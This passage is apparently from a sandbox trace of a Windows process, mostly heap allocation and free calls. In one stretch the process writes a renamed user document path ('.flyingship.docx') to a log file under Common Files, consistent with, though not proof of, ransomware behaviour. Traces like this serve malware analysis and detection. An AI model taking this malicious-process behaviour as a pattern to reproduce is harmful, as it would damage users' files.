lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0168.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0168.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0168.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0168.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0168.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0168.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0168.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0168.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xf0) returned 0x8feba8 [0168.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0168.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0168.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0168.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0168.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0168.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0168.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0168.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0168.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0168.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0168.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0168.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0168.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0168.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0168.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0168.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0168.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0168.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0168.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xa6b008 [0168.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0168.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0168.770] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0168.770] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.770] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0168.770] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.770] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0168.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0168.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0x9c5180 [0168.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0168.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0168.771] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0168.771] ReadFile (in: hFile=0x138, lpBuffer=0xa6b008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xa6b008*, lpNumberOfBytesRead=0x87f43c*=0xcf3, lpOverlapped=0x0) returned 1 [0168.771] ReadFile (in: hFile=0x138, lpBuffer=0xa6b008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xa6b008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0168.771] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0xcf3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.771] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0168.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0168.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0168.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0168.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0168.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0-MFkGR.flyingship.docx\r\n", cchWideChar=66, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 66 [0168.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x42) returned 0x9aa4f8 [0168.772] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0-MFkGR.flyingship.docx\r\n", cchWideChar=66, lpMultiByteStr=0x9aa4f8, cbMultiByte=66, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0-MFkGR.flyingship.docx\r\n", lpUsedDefaultChar=0x0) returned 66 [0168.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0168.772] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0168.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0168.772] WriteFile (in: hFile=0x138, lpBuffer=0x923b28*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x923b28*, lpNumberOfBytesWritten=0x87f43c*=0x41, lpOverlapped=0x0) returned 1 [0168.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0168.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0168.772] CloseHandle (hObject=0x138) returned 1 [0168.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0168.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0168.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa6b008 | out: hHeap=0x8a0000) returned 1 [0168.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0168.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0168.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0168.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0168.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0168.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0168.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0168.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0168.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0168.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0168.775] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0168.775] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0168.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0168.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0168.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0168.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0168.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0168.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0168.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0168.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0168.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0168.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0168.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0168.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0168.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0168.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0168.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0168.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0168.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0168.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0168.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0168.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0168.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0168.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0168.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0168.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0168.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0168.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0168.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0168.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0168.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0168.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0168.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0168.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0168.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0168.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0168.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0168.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0168.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0168.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0168.776] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0168.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0168.777] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0168.777] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0168.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0168.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0168.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0168.778] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0168.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0168.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0168.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0168.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1ad0 [0168.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0168.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0168.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0168.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0168.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0168.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0168.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0168.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda08 [0168.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0168.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0168.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0168.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0168.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0168.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0168.779] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0168.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0168.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0168.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0168.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0168.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0168.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0168.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0168.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0168.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0168.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0168.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0168.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0168.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0168.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0168.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0168.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0168.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0168.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0168.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0168.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0168.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0168.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0168.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0168.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0168.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0168.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0168.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0168.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0168.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0168.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0168.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0168.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0168.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0168.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0168.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0168.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0168.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0168.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0168.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0168.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0168.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0168.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0168.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0168.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0168.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0168.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0168.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0168.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0168.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0168.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0168.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0168.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0168.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0168.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0168.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0168.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0168.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0168.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0168.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0168.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0168.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0168.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0168.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0168.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0168.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0168.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0168.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0168.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0168.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0168.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0168.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0168.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0168.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0168.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0168.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0168.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0168.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0168.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0168.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0168.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0168.782] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0168.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0168.782] RtlAllocateHeap 